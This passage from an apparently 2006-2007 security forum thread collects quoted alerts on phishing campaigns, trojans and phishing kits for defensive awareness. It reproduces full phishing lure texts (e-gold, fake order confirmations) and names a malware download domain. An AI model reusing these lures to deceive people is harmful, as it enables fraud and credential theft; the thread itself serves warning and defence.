To futher extend this, two factor authentication also does NOT protect the end host security, a malware (such as keylogger, BHO) could be installed on the client's machine and effectively gather the credential and login on behalf of the victim instead of letting the victim login. This is a classic problem of "you are only as secure as the weakest link". Two factor authentication is good for secure authentication but does not take care of mutual authentication or endpoint security. From the financial organization perspective, maybe further investment into mutual authentication and ensuring client's computer being free of malware would be necessary to protect the client's online transactions."

* http://blog.washingt..._2factor_1.html

** http://www.networkse...rAuthentication

:huh:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#77 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 20 July 2006 - 02:29 PM

Good grief.

IRS refund... (phish)
http://isc.sans.org/...hp?storyid=1500
Last Updated: 2006-07-20 17:06:54 UTC
"...A cute little Phish Mail that claims to come from the IRS (Internal Revenue Service) who are desperately trying to refund some money directly to your Visa card. All they need is your Social Security Number and the Visa card #. And, incidentially, IRS processing seems to be done in Romania (hxxp://ap[dot]ro) nowadays. Outsourcing, most likely ;o) ..."

EDIT/ADD:
- http://www.irs.gov/n...=160334,00.html
July 19, 2006
"...“The IRS does not send out unsolicited e-mails asking for personal information,” said IRS Commissioner Mark W. Everson..."
- http://www.irs.gov/n...=155682,00.html

:(

Edited by apluswebmaster, 30 July 2006 - 07:46 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#78 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 24 July 2006 - 06:10 AM

FYI...

E-Gold Scams
- http://isc.sans.org/...hp?storyid=1507
Last Updated: 2006-07-24 00:00:45 UTC
"Reader Ivan alerted us earlier today about an email scam that has surfaced in the past few days. Here's the text of the message he saw:

Subject: egold transaction
Message:
Good day,
Yesterday I was checking my egold account and was surprised at what I saw: I had almost 200 ounces of gold (USD 100,177.90). I never had so much money, (I only had USD177.90 in my account at he time of this transaction) I don't know how did they get there. I clicked on history and saw that money were transferred 2 hours ago, in the memo field I saw your email address:[email] When I was trying to sort this out - money disappeared from my egold account. I lost my money and money that came from nowhere. I changed my password immediately and now I am trying to find out what has happened. Luckily I made a screenshot with the transaction history for you to see and tell me what is going on. I hope that you will let me know what has happened. I did not contact egold support yet. I hope that we will be able to sort this matter ASAP. Before I will contact them.
Regards,
Jannet Johnston

Not a bad job of building a scam. As you might expect, there was a file attachment that looks fairly innocent, "screen.zip" and likely would fool many unsuspecting victims. Opening the file we find an executable file inside the archive that is named "screen.jpeg (many spaces) .exe" that in turn has a filesize of 8,485 bytes. Most of you know what happens next...
Ivan did a bit more analysis and found that the .exe file drops a .dll component that is installed as a Browser Helper Object (BHO). The dropped component also downloads mailordermarijuana.ca/images/mod.gif (careful!!) The mod.gif file (11,570 bytes) is also a .exe dropper which in turn also installs another .dll in the infected system. The second .dll looks like a Trojan-Spyware stealing e-gold account information from the users of the infected system. Handler Lenny found a blog* that seems to indicate this scam started a few days ago..."

* http://blog.findinfo...d-fraud-beware/

:eek:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#79 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 24 July 2006 - 01:46 PM

FYI...

New Haxdoor variant via spoofed E-mail from ecost
- http://isc.sans.org/...hp?storyid=1508
Last Updated: 2006-07-24 14:53:45 UTC
"We received several notifications of an email being spoofed from ecost. It is being used to "socially engineer" or trick people into installing a new version of Haxdoor. This virus was largely undetected by most of the commercial antivirus vendors yesterday. We have submitted samples to most of the commercial antivirus vendors. They are responding rapidly and in many cases they are able to detect it now...

---- Text from original message -----
Dear Sir/Madam,
Thank you for shopping with our internet shop. Your order, WC2905036, has been received. Summary of your order you can see in the attachment file.
This email is to confirm the receipt of your order. Please do not reply as this email was sent from our automated confirmation system.
Please Note: There is no need to re-send your request or call our customer service department for status or tracking number, this will only delay our response time to you. Rest assured, we are making every effort to process and ship your order within 1 to 2 business days. We appreciate your understanding and patience and do value your business.
Once your order has been processed and shipped a FEDEX Tracking number will be automatically emailed to the address provided.
Please Note: Tracking information will be available in FedEx's system only after 10pm EST Monday thru Friday. If you receive a tracking number on Sunday, you will be able to track it Monday evening after 10pm EST. All orders placed including 1-2 or 2-3 business day options are shipped within 48 hours providing the merchandise is in stock.
All FedEx Ground orders will take 7-10 business days to arrive. Some packages may require a signature upon delivery. These packages will not be left without a signature. For your convenience, we will email you a FedEx tracking number on all successfully processed and shipped orders. All Plasma TVs, DVD players, Scanners, Fax Machines, Receivers, Home Theater, and Printers are not returnable after box is opened.
To insure the best handling of your order please allow 24-48 business hours for the processing and the shipping of your order. Thank you for your cooperation.
We hope you enjoy your order! Thank you for shopping with us!
----- End text from message -----


(May be similar to: http://www.symantec....-071214-4735-99
: "...Backdoor.Haxdoor.N is a Trojan horse program that opens a back door on the compromised computer and allows a remote attacker to have unauthorized access. It also steals passwords and drops a rootkit that will run in safe mode, making this threat difficult to remove...")


> http://www.sophos.co...jhaxdoorcp.html
"Subject line: Confirmation for Order WC2905036"
24 July 2006 14:13:10 (GMT)

====================================

- http://isc.sans.org/...=1&storyid=1508
Last Updated: 2006-07-25 16:22:24 UTC ...(Version: 2)
"UPDATE: These are also being sent out spoofed from customercare@bestbuy.com and customercare@amazon.com..."
====================================
Yet another:

- http://msmvps.com/bl.../25/105724.aspx
"----- EMAIL TO AVOID -----
Downloader-AXM - Massively spammed on 07/24/2006
http://vil.nai.com/v...nt/v_140257.htm

From: billing support [mailto:info@walmart.com]

Subject: Your order information WC2905036
Message: Dear Sir/Madam, Thank you for shopping with our internet shop. Your order, WC2905036,has been received. Summary of your order you can see in the attachment
file.
Attachment: wc2905036.exe ..."

:ph34r:

Edited by apluswebmaster, 26 July 2006 - 10:02 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#80 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 01 August 2006 - 04:59 PM

FYI...

- http://www.darkreadi...;WT.svl=news1_1
8.1.2006
"...A phishing email is circulating that poses as a message from service@microsoft.com and offers prize money that a recipient would claim by linking to the "Microsoft Resolution Centre," a malware site that mimics Microsoft's but has malware that then installs a Trojan on the victim's PC. The phish was first spotted by SurfControl* in Sydney, Australia over the weekend. "The Trojan will open a backdoor on the PC, allowing a remote intruder to gain access and control over the computer," says Susan Larson, vice president, threat analysis and research at SurfControl, which contacted Microsoft about the phish..."
* http://www.surfcontr...amp;mnuid=6.2.1

:(

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#81 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 08 August 2006 - 06:12 AM

FYI...

Phishing Alert: Data Stolen via ICMP/IE-BHO
- http://www.websense....php?AlertID=570
August 07, 2006
"Websense® Security Labs™ has received a sample of a new phishing Trojan that delivers stolen information back to the attacker via ICMP packets. Upon infection of a victim's computer, the Trojan will install itself as an Internet Explorer Browser Helper Object (BHO). The BHO then waits for the user to post personal information to a monitored website. As this information is entered by the user, it is captured by the BHO and sent back to the attacker.
The method of network transport used by the attacker makes this Trojan unique. Typically, keyloggers of this type will send the stolen information back to the attacker via email or HTTP POST, which can appear suspicious. Instead, this Trojan encodes the data with a simple XOR algorithm before placing it into the data section of an ICMP ping packet.
To network administrators and egress filters, this ICMP packet looks like legitimate traffic leaving the network. However, the ICMP packet actually contains encoded personal information entered by a user. The attackers presumably capture this packet at their remote server, where the packet is easily decoded to reveal the information entered by the user..."

.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#82 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 16 August 2006 - 02:15 PM

FYI...

Brasilian Right to Vote revoked by Phish!
- http://www.websense....php?AlertID=576
August 16, 2006
"Websense® Security Labs™ has received reports of a new phishing attack that targets customers of the Brasilian Tribunal Superior Eleitoral. Users receive a spoofed email message claiming that their entry in the electoral roll has been cancelled. To learn the reason for the cancellation and be able to reinstate their right to vote at the upcoming elections, they will have to read the attached regulations. The link provided by the email leads to a download for a Trojan that installs malicious code on the user's computer. The URL leading to the malicious code is hosted in Korea and was up at the time of this Alert..."

(Screenshots available at the URL above.)

:(

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#83 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 02 September 2006 - 05:35 PM

FYI...

AT&T hack exposes 19,000 identities
- http://www.sfgate.co...;type=printable
September 1, 2006
"...AT&T's press release this week made no mention of the phishing aspect of the scam. But the company's internal memo warns employees to be on the lookout for phony e-mail. "Impacted customers may receive an e-mail that appears to be from AT&T but is actually from the unauthorized person requesting additional personal information such as Social Security number, driver's license number, date of birth or other credit card information," it says. AT&T's Sharp said individual customers were warned of the phishing threat in e-mail this week from AT&T. "We don't know how many people received the phishing e-mails," he said. "We indicated (to customers) that there was an apparent phishing expedition going on that was linked to this incident and was not from AT&T"..."

:eek: :grrr:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#84 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 02 October 2006 - 03:14 PM

FYI...

Email Fraud Using Brazilian Gol Airlines Crash
- http://www.websense....php?AlertID=646
October 02, 2006
"Websense Security Labs™ has received reports of a fraudulent email which targets Brazilian users. Users receive an email with a link to a malicious website containing pictures of the recent Gol Airlines Boeing 737 crash in Brazil. This website contains a Trojan downloader which is used to install a banking keylogger..."

(Screenshots available at the Websense URL above.)

:grrr:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#85 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 06 October 2006 - 09:34 AM

Good reference. Great charts.

- http://phishregistry.org/
"Secure Computing monitors phishing activity for over a thousand financial institutions and large online organizations using a collaborative network of over 4000 appliances... PhishRegistry.org is a free resource provided by Secure Computing, Inc. to help businesses know when they are at risk of being phished..."


;)

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#86 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 16 October 2006 - 02:41 PM

FYI...

Quality, quantity of phishing kits on the rise
- http://news.com.com/...g=st.util.print
Oct 16, 2006
"The marketplace for phishing toolkits, which can allow technophobe criminals to quickly and easily set up spoofed versions of banking Web sites, is booming, with kits changing hands for as little as $30. Although phishing kits are nothing new, in the past year their quantity and quality have increased dramatically, according to Dan Hubbard, vice president of security research for Websense and a representative of the Anti-Phishing Working Group. Phishing kits "have been around for years, but the volume is one of the big changes," Hubbard said. "The kits available are better designed." In particular, Hubbard noted that the kits were vaunting their immunity to common defensive techniques. These include detection by signature-based defensive programs, which look for the signature, or the "fingerprint," of known malicious software. Another is heuristics, which use pattern recognition to identify threats. "The kit makers publish and test against signature detection as part of their advertising portfolio--'not detected by antivirus, not detected by heuristics, not detected by signatures'"... "The obfuscation techniques they use are very difficult to detect with antivirus because JavaScript can be tuned, changed on the fly and every user can have a different version of the content," Hubbard said. With a kit like "Webattacker, for example, every single person who installs it has their own personal version, and each user who connects to the Web site--depending on their browser--is served up with their own exploit code," Hubbard said. "There is no consistency with regards to heuristics."

:eek:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#87 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 27 October 2006 - 12:17 PM

FYI...

Scams Target Latest Upgrades in E-Banking Security
- http://blog.washingt...web_bankin.html
October 27, 2006
"Financial institutions across the country are scrambling to meet a Dec. 31 deadline set by banking industry regulators to have security processes in place for online banking that go beyond simply requiring customers to enter a user name and password. While some of the protections being adopted should help people -feel- more confident about online banking, there are signs that criminals already are adapting their techniques to defeat those measures... Take, for example, a phishing e-mail from earlier this week targeting Bank of America customers with the usual message urging the recipient to "update their account information," in this case due to a supposed "server update" by the bank. Users who click on the included link are brought to a page that prompts the visitor to reset their account data by supplying their "old" password and user name, as well as their "previous" two SiteKey questions and answers... It would be interesting to compare the results of the anti-phishing technology built into the latest releases of both Microsoft's Internet Explorer 7 and Mozilla's Firefox 2.0 browsers. When I visited this particular site in Firefox, I received a pop-up alert from Netcraft's anti-phishing toolbar, but also from Firefox, which flagged the scam site as a "suspected web forgery" and included links I could click on to earn more about phishing scams. When I visited the Bank of America scam site in IE7, I received no such alert."

:eek:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#88 quietman7

quietman7

    quietman7

  • Helper
  • PipPipPipPipPip
  • 680 posts

Posted 30 October 2006 - 09:36 AM

Phishing attack targets MySpace users

Phishers have found a way to use genuine MySpace.com accounts to trick users into revealing their account information.

Web analysis firm Netcraft reported on Friday that a MySpace user was emailing potential victims inviting them to visit a fraudulent login page, where they were asked to enter their email address and password. That information was then sent to a server located in France, according to Netcraft.

The attack, which has now been shut down by MySpace, took advantage of the way the site organises URLs in order to give the fake login page a believable web address...


Microsoft MVP - Consumer Security 2007-2015 MVP.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

#89 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 10 November 2006 - 03:56 PM

FYI...

"Monster" Phish Bait
- http://isc.sans.org/...hp?storyid=1842
Last Updated: 2006-11-10 19:26:04 UTC
"A reader recently submitted for review a new phish attempt which asks readers to download the "new Monster Job Seeker Tool". The email looks authentic, as the HTML source code is pulling images from monster.com, as well as having links to other monster.com pages, however the download does not come from monster.com. The download software link pulls the download from monster-freesoftware.com. Of course, what is downloaded is not something monster.com would approve of. I have sent a copy of the email to abuse@monster.com for their records as well."

:angry:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#90 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 11 November 2006 - 02:17 PM

FYI...

Social Security Admin warns of e-mail scam
- http://www.ssa.gov/p...hingScam-pr.htm
November 7, 2006
"The Agency has received several reports of an email message being circulated with the subject “Cost-of-Living for 2007 update” and purporting to be from the Social Security Administration. The message provides information about the 3.3 percent benefit increase for 2007 and contains the following:

“NOTE: We now need you to update your personal information. If this is not completed by November 11, 2006, we will be forced to suspend your account indefinitely.”

The reader is then directed to a website designed to look like Social Security’s Internet website... Once directed to the phony website, the individual is asked to register for a password and to confirm their identity by providing personal information such as the individual’s Social Security number, bank account information and credit card information... To report receipt of this email message or other suspicious activity to Social Security’s Office of Inspector General, please call the OIG Hotline at 1-800-269-0271. (If you are deaf or hard of hearing, call the OIG TTY number at 1-866-501-2101)..."

:evilgrin:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#91 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 22 November 2006 - 07:56 AM

FYI...

MS brings 129 lawsuits against phishers
- http://preview.tinyurl.com/ymuv6e
Nov 22, 2006
"AMSTERDAM (Reuters) - Microsoft is helping law enforcers hunt down criminals who try to steal bank account details on the Internet and has initiated 129 lawsuits in Europe and the Middle East, the U.S. software company said. One court case in Turkey has already led to a 2.5-year prison sentence for a so-called "phisher" in Turkey, and another four cases against teenagers have been settled out of court, Microsoft said on Wednesday, eight months after it announced the launch of a Global Phishing Enforcement Initiative in March... Of the 129 lawsuits that have been initiated, 97 are criminal procedures in which Microsoft and other technology companies have provided information... Phishing has mushroomed over the last few years, with the number of attempts to trick citizens into handing over their bank account details almost doubling in the first half of 2006 to 157,000, according to a recent report from security software vendor Symantec... (Microsoft) has an investigative team at its headquarters in Redmond, Washington, which uses Web-crawling software and customer complaints to find out where attacks are taking place... Before legal action was taken, 253 cases were investigated. Most of the investigations and 50 of the criminal complaints were filed in Turkey. Germany was second with 28 criminal complaints and France third with 11..."

:!:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#92 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 27 November 2006 - 10:33 PM

FYI...

Google flaw adds phishing hole to Web sites
- http://news.com.com/...g=st.util.print
Nov 27, 2006
"A security flaw in Google's search appliances could expose Web sites that use the products to information-stealing phishing attacks, experts warned Monday. The Google Search Appliance and Google Mini are used by organizations including banks and universities to add search features to Web sites. A flaw in the way the systems handle certain characters makes it possible to craft a Web link that looks like it points to a trusted site, but when clicked serves up content from a third, potentially malicious site. "This vulnerability affects a lot of very large Web sites," John Herron, a security expert who maintains the NIST.org site, said in an e-mail. "It basically allows a virtual defacement of a Web site when following a malicious link." The vulnerability provides cybercrooks a hook for phishing attacks, scams that try to trick people into giving up sensitive information such as credit card data and Social Security numbers. Phishing scams typically use spam e-mail with a link to a fraudulent Web site... One way Internet users can protect themselves against attacks that attempt to exploit the flaw in the Google appliances is to inspect Web links. The rigged links will be very long, according to security experts. Users of the Google appliances who have not heard from Google should contact the company for a fix. "Web site owners must be diligent about finding and fixing vulnerabilities, (since) even products supplied by well-known brands possess these extremely common issues," Grossman said."

:eek:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#93 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 28 November 2006 - 10:12 PM

FYI...

Phishing by proxy
- http://isc.sans.org/...hp?storyid=1895
Last Updated: 2006-11-28 23:42:21 UTC by William Salusky
"...I had been investigating reports of phishing and miscreant web sites being hosted in specific user land network IP space, only to discover they were not in fact malicious users and in fact innocent users who had somehow been duped and computers compromised, resulting in a proxybot infection that would phone home announcing the availability of anonymous proxy redirect services offering controllable port TCP port 80 and 443 redirects to an upstream mothership. These bots/agents also offer DNS service at the phishers whim in acting as authoritative NS targets with fast flux domain resolution techniques often found used in short lived phishing attacks or by any other type of garbageware pushers. All that functionality [in this variant] comes in an 11k footprint, and hasn't been well detected by AV vendors either. The AV vendors that do offer detection [for this specific variant I am referring to] unfortunately offer only innocuous names like "Trojan-Downloader.Win32.Small.dho", or "W32/Malware" which does nothing to improve awareness of the threat... I had received notice of various european financial services being proxied via these proxybotted agents, but by the time I had acquired malware samples the proxying for phishing sites had ceased and in it's stead came a wave of Money Mule recruitment sites being redirected via these proxies. I suppose that upstream phishers ran out of individuals they could abuse in financial fraud, hence had to go on a recruitment/hiring binge. What I have found that works reasonably well in my situation to identify these infection types going forward, is to search DNS cache dumps/logs for DNS A records that point into dynamically provisioned IP space for host domain records not belonging to any typical dynamic DNS provisioning services. More often than not, an isolated and suspiciously named A record association pointing into wildly dynamic IP space [in my experience] implies that something wicked that way goes. I looked at alerting based on discovered target ip/hostname phone home destinations, but that seems to me to be a game that only the running man can play.
> It's an obviously serious issue when it comes to combatting the phish problem where a successful takedown of a reported phish site that is only proxy will just be removing one node from the farm, while the upstream mothership continues with a typically long shelf life due to the effective anonymity offered by proxybotted hosts..."

Alternative detection method:
- http://www.safer-net...tory/index.html
Updates - 17. November 2006
"...+ Win32.Small.doh..."

:ph34r:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#94 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 15 December 2006 - 04:53 PM

FYI...

U.K. banking scams up 8,000 Percent in 2 Years
- http://news.bbc.co.u...ics/6177555.stm
13 December 2006
"The UK has seen an 8,000% increase in fake internet banking scams in the past two years, the government's financial watchdog has warned. The Financial Services Authority (FSA) told peers it was "very concerned" about the growth in "phishing"... The amount stolen is still relatively small but it is set to go up by 90% for the second year running, peers heard. Between January and June 2005, the number of recorded phishing incidents was 312, the Lords science and technology committee was told. The figure for the same period this year was 5,059, according to banking trade body Apacs figures. The amount of cash stolen in the first half of 2006 was £23.2m, the committee was told, and was likely to be £22.5m in the second half of the year..."

:eek:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#95 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 26 December 2006 - 08:09 AM

FYI...

G-mail phish...
- http://www.viruslist...logid=208187298
December 22, 2006
"We always expect a rise in cyber crime in the holiday season. This year, for instance, we have seen a noticeable rise in spam, along with a rise in phishing. I have even received a phishing email in my Gmail mailbox – the first one in ages. The phish was nothing special; the usual notification about a new payment system for an online bank with a link to the spoofed website. What caught my eye was how Google handled the phish. The Gmail interface added a number of relevant paid advertising links to the email... I think that adding such links increase user trust in fraudulent emails. Users see that Google has included keyword-related links, so they are liable to trust the email – and fall victim to the phishing scam..."

(Screenshot available at the URL above)

:eek:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#96 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 03 January 2007 - 09:45 AM

FYI...

Not Your Average Phishing Scam
- http://blog.washingt...zon_phishi.html
January 3, 2007 - "One of the first phishing scams to catch Security Fix's eye in the new year -- a counterfeit Amazon.com login page -- may set the tone for the sophistication of online schemes involving fake bank and e-commerce sites in 2007. The bogus site, which was active as of early Tuesday morning, makes use of the real Amazon.com site in an effort to fool visitors into entering their real usernames and passwords. This type of trick, known as a type of "man-in-the-middle" attack, logs the user into his or her account at Amazon.com, then it displays the data that Amazon serves up once the user is logged in. Visitors who supply bogus or otherwise incorrect usernames and passwords are shown a copy of the page Amazon users normally see if they mistype either of their credentials. The lure in this phishing attack is an e-mail that warns the recipient about supposed unauthorized activity on his or her Amazon account and directs the user to reset the account's credentials. Anyone who enters a real Amazon username and password is asked to provide their date of birth, address and Social Security number. Security Fix first learned of this scam site from Paul Laudanski of Castlecops.com..."

(Screenshot available at the URL above.)

:!:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#97 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 03 January 2007 - 11:36 AM

FYI...

Locating new phishing sites
- http://www.f-secure....7.html#00001067
January 3, 2007 ~ "Phishing sites are easy to locate once the bad boys start spamming out thousands of mails linking to their site. But how can such sites be found before that?... At the time of posting this entry, none of the common browsers (IE, Firefox, Opera) detected this site as a phishing site with their built-in filters. Soon they will."

Flash Phishing
- http://www.f-secure....7.html#00001066
January 3, 2007 ~ "We've now seen several phishing web sites that are using flash-based content instead of normal HTML. Probably the main to reason to do this is to try to avoid phishing toolbars that analyze page content. Two recent examples, both targeting PayPal: ... ppal-form-ssl. com and ... welcome-ppl. com . These sites look like the real PayPal front page, but they are actually Flash recreations..."

(Screenshots available at the URLs above.)

:eek:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#98 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 10 January 2007 - 03:15 PM

FYI...

RSA Alert: New Universal Man-in-the-Middle Phishing Kit Discovered
- http://www.rsasecuri...asp?doc_id=7667
January 10, 2007 — "RSA, The Security Division of EMC, announced today that its 24x7 Anti-Fraud Command Center (AFCC) has uncovered a new phishing kit being sold and used online by fraudsters. This new kit, a Universal Man-in-the-Middle Phishing Kit, is designed to facilitate new and sophisticated attacks against global organizations in which the victims communicate with a legitimate web site via a fraudulent URL set by the fraudster. This allows the fraudster to capture victims' personal information in real-time.
How it works
Using the Universal Man-in-the-Middle Phishing Kit, the fraudster creates a fraudulent URL via a simple and user-friendly online interface. This URL communicates with the legitimate website of the targeted organization in real-time - whether it is the online banking site of a financial institution, the order tunnel of an ecommerce company, or any other such business transacting with its users online. The victim receives a "standard" phishing email, and when clicking on the link s/he is directed to the fraudulent URL. The victim then interacts with genuine content from the legitimate website - which has been "imported" by the attack into the phishing URL - thus allowing the fraudster seamless, invisible and immediate access to the victim's personal information..."

:eek:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#99 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 12 January 2007 - 08:39 PM

FYI...

New MySpace Phish using CSS
- http://www.websense.....php?BlogID=104
Jan 12 2007
"This afternoon we discovered another attack on Myspace. MySpace users receive a message in their profile from someone called "Arnelle" with the following text:
"this chick is using like almost all of ur pix and part of ur profile.. people have no lives, i swear. heres the URL if u want to check it out"
Followed by a link to their Myspace page. The page itself is hosted within the Myspace.com domain and is a users profile page. Upon accessing the site the user is presented with their login credentials. A couple things to note here. The code writer took special note to change the authentication picture to show that it says, “profile.myspace.com” instead of “login.myspace.com” as it normally should. One mistake the code writer made was that he did not create a password field which hides the password while the end user types it in. The attacker used code within a Cascading Style Sheet (CSS) to overlay the main user profile and present their own text and images. If users enter in their credentials the information is posted to a website which is hosted in the United Kingdom..."

(Screenshots available at the URL above.)

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#100 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 10,566 posts

Posted 15 January 2007 - 09:05 AM

FYI...

Phishing By The Numbers: 609,000 Blocked Sites...
- http://news.netcraft...es_in_2006.html
Jan 15, 2007 ~ "The Netcraft Toolbar blocked more than 609,000 confirmed phishing URLs in 2006, an enormous jump from just 41,000 in 2005. The volume of attacks grew gradually until the final quarter of the year, when the number of blocked sites soared as attackers perfected techniques to automate and propagate networks of spoof pages. These networks were replicated across botnets, creating a huge jump in submissions and confirmed phishing sites. Blocked URLs ranged between 1,000 and 20,000 per month before ramping up to 45,000 in October, 135,000 in November and more than 277,000 in December... The dramatic surge in attacks was fueled by new tools to rapidly deploy entire networks of phishing sites on cracked web servers. These packages, known broadly as Rockphish or R11, each included dozens of sites spoofing major banks... 942 institutions were targeted in 2006, including banks and credit unions of all sizes, online payment gateways, e-commerce retailers, social networking sites, ISPs, online games and government agencies..."

> http://toolbar.netcraft.com/

:!:

Edited by apluswebmaster, 15 January 2007 - 09:11 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Member of ASAP and UNITE
Support SpywareInfo Forum - click the button